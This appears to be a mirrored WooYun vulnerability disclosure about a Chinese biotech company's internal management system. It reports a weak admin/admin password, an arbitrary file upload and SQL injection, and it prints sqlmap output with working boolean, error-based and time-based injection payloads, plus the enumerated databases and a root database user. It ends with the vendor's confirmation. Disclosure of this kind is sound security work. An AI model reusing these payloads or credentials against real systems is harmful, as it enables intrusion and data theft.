乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-21: 细节已通知厂商并且等待厂商处理中 2015-12-25: 厂商已经确认,细节仅向厂商公开 2016-01-04: 细节向核心白帽子及相关领域专家公开 2016-01-14: 细节向普通白帽子公开 2016-01-24: 细节向实习白帽子公开 2016-02-07: 细节向公众公开
RT
深圳市达科为生物技术有限公司(Dakewe Biotech Co., Ltd.)创立于1999年,经过十余年的快速发展,现已形成以深圳为总部,在北京、上海、广州、成都、武汉、香港等十余城市设有分支机构的集团性企业。员工超过200人,其中90%的人员拥有本科及以上的学历。公司主要业务涉及生物科学(BioScinece)和生物医学(BioMedicine)两大细分领域,包括生命科学研究用仪器(Scientific Instruments)和试剂(Life Science Reagents)、医疗设备(Medical Equipments)和诊断试剂(Diagnostic Reagents)等产品和技术的研发、生产及营销推广。
目标地址:**.**.**.**:8080/system/login.phpadmin/admin01. 弱口令
02. 任意上传
03. sql注入
sqlmap identified the following injection points with a total of 248 HTTP(s) requests:---Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: **.**.**.**:8080/system/index.php?action=&m=maintain&subaction=&tab=mytask&status=noreceive&keyword=1%' AND 9730=9730 AND '%'='&report_id=&report_name=&report_type=maintain&time_filter=create_date&t_create_type=simple&t_create_date_range=thisyear&t_create_start_year=2015&t_create_start_month=12&t_create_start_day=21&t_create_end_year=2015&t_create_end_month=12&t_create_end_day=21&time_1=create_date&time_2=create_date&time_3=>&time_4=&contact_name=&contact_telephone=&group_id=&customer_group=&cat_id=&cat_path=&customer_branch_id=&province=&city=&area=&select_city=&chinaprovinces_province632=&chinaprovinces_city632=&chinaprovinces_area632=&customer_level=&customer_source=&customer_other=&customer_other_value=&warranty=&service_type=&list_status=&appearance=&reason=&step=&balance_type=&project_name=&source=¤t_branch_id=&handlers=&biz_handler=&complete_status=&maintain_other=&maintain_other_value=&brand=&category=&model=&pin_1=&pin_2=&machine_other=&machine_other_value= Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: **.**.**.**:8080/system/index.php?action=&m=maintain&subaction=&tab=mytask&status=noreceive&keyword=1%' AND (SELECT 1642 FROM(SELECT COUNT(*),CONCAT(0x71787a6271,(SELECT (ELT(1642=1642,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&report_id=&report_name=&report_type=maintain&time_filter=create_date&t_create_type=simple&t_create_date_range=thisyear&t_create_start_year=2015&t_create_start_month=12&t_create_start_day=21&t_create_end_year=2015&t_create_end_month=12&t_create_end_day=21&time_1=create_date&time_2=create_date&time_3=>&time_4=&contact_name=&contact_telephone=&group_id=&customer_group=&cat_id=&cat_path=&customer_branch_id=&province=&city=&area=&select_city=&chinaprovinces_province632=&chinaprovinces_city632=&chinaprovinces_area632=&customer_level=&customer_source=&customer_other=&customer_other_value=&warranty=&service_type=&list_status=&appearance=&reason=&step=&balance_type=&project_name=&source=¤t_branch_id=&handlers=&biz_handler=&complete_status=&maintain_other=&maintain_other_value=&brand=&category=&model=&pin_1=&pin_2=&machine_other=&machine_other_value= Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: **.**.**.**:8080/system/index.php?action=&m=maintain&subaction=&tab=mytask&status=noreceive&keyword=1%' AND (SELECT * FROM (SELECT(SLEEP(5)))EuBE) AND '%'='&report_id=&report_name=&report_type=maintain&time_filter=create_date&t_create_type=simple&t_create_date_range=thisyear&t_create_start_year=2015&t_create_start_month=12&t_create_start_day=21&t_create_end_year=2015&t_create_end_month=12&t_create_end_day=21&time_1=create_date&time_2=create_date&time_3=>&time_4=&contact_name=&contact_telephone=&group_id=&customer_group=&cat_id=&cat_path=&customer_branch_id=&province=&city=&area=&select_city=&chinaprovinces_province632=&chinaprovinces_city632=&chinaprovinces_area632=&customer_level=&customer_source=&customer_other=&customer_other_value=&warranty=&service_type=&list_status=&appearance=&reason=&step=&balance_type=&project_name=&source=¤t_branch_id=&handlers=&biz_handler=&complete_status=&maintain_other=&maintain_other_value=&brand=&category=&model=&pin_1=&pin_2=&machine_other=&machine_other_value=---web server operating system: Windowsweb application technology: PHP 5.2.14, Apache 2.2.17back-end DBMS: MySQL 5.0available databases [4]:[*] information_schema[*] mis2010[*] mysql[*] testsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: **.**.**.**:8080/system/index.php?action=&m=maintain&subaction=&tab=mytask&status=noreceive&keyword=1%' AND 9730=9730 AND '%'='&report_id=&report_name=&report_type=maintain&time_filter=create_date&t_create_type=simple&t_create_date_range=thisyear&t_create_start_year=2015&t_create_start_month=12&t_create_start_day=21&t_create_end_year=2015&t_create_end_month=12&t_create_end_day=21&time_1=create_date&time_2=create_date&time_3=>&time_4=&contact_name=&contact_telephone=&group_id=&customer_group=&cat_id=&cat_path=&customer_branch_id=&province=&city=&area=&select_city=&chinaprovinces_province632=&chinaprovinces_city632=&chinaprovinces_area632=&customer_level=&customer_source=&customer_other=&customer_other_value=&warranty=&service_type=&list_status=&appearance=&reason=&step=&balance_type=&project_name=&source=¤t_branch_id=&handlers=&biz_handler=&complete_status=&maintain_other=&maintain_other_value=&brand=&category=&model=&pin_1=&pin_2=&machine_other=&machine_other_value= Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: **.**.**.**:8080/system/index.php?action=&m=maintain&subaction=&tab=mytask&status=noreceive&keyword=1%' AND (SELECT 1642 FROM(SELECT COUNT(*),CONCAT(0x71787a6271,(SELECT (ELT(1642=1642,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&report_id=&report_name=&report_type=maintain&time_filter=create_date&t_create_type=simple&t_create_date_range=thisyear&t_create_start_year=2015&t_create_start_month=12&t_create_start_day=21&t_create_end_year=2015&t_create_end_month=12&t_create_end_day=21&time_1=create_date&time_2=create_date&time_3=>&time_4=&contact_name=&contact_telephone=&group_id=&customer_group=&cat_id=&cat_path=&customer_branch_id=&province=&city=&area=&select_city=&chinaprovinces_province632=&chinaprovinces_city632=&chinaprovinces_area632=&customer_level=&customer_source=&customer_other=&customer_other_value=&warranty=&service_type=&list_status=&appearance=&reason=&step=&balance_type=&project_name=&source=¤t_branch_id=&handlers=&biz_handler=&complete_status=&maintain_other=&maintain_other_value=&brand=&category=&model=&pin_1=&pin_2=&machine_other=&machine_other_value= Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: **.**.**.**:8080/system/index.php?action=&m=maintain&subaction=&tab=mytask&status=noreceive&keyword=1%' AND (SELECT * FROM (SELECT(SLEEP(5)))EuBE) AND '%'='&report_id=&report_name=&report_type=maintain&time_filter=create_date&t_create_type=simple&t_create_date_range=thisyear&t_create_start_year=2015&t_create_start_month=12&t_create_start_day=21&t_create_end_year=2015&t_create_end_month=12&t_create_end_day=21&time_1=create_date&time_2=create_date&time_3=>&time_4=&contact_name=&contact_telephone=&group_id=&customer_group=&cat_id=&cat_path=&customer_branch_id=&province=&city=&area=&select_city=&chinaprovinces_province632=&chinaprovinces_city632=&chinaprovinces_area632=&customer_level=&customer_source=&customer_other=&customer_other_value=&warranty=&service_type=&list_status=&appearance=&reason=&step=&balance_type=&project_name=&source=¤t_branch_id=&handlers=&biz_handler=&complete_status=&maintain_other=&maintain_other_value=&brand=&category=&model=&pin_1=&pin_2=&machine_other=&machine_other_value=---web server operating system: Windowsweb application technology: PHP 5.2.14, Apache 2.2.17back-end DBMS: MySQL 5.0current user: 'root@localhost'
就到这里,没深入了。。。
修复~~
危害等级:高
漏洞Rank:10
确认时间:2015-12-25 15:50
非常感谢您的报告。报告中的问题已确认并复现.影响的数据:高攻击成本:低造成影响:高综合评级为:高,rank:10正在联系相关网站管理单位处置。
暂无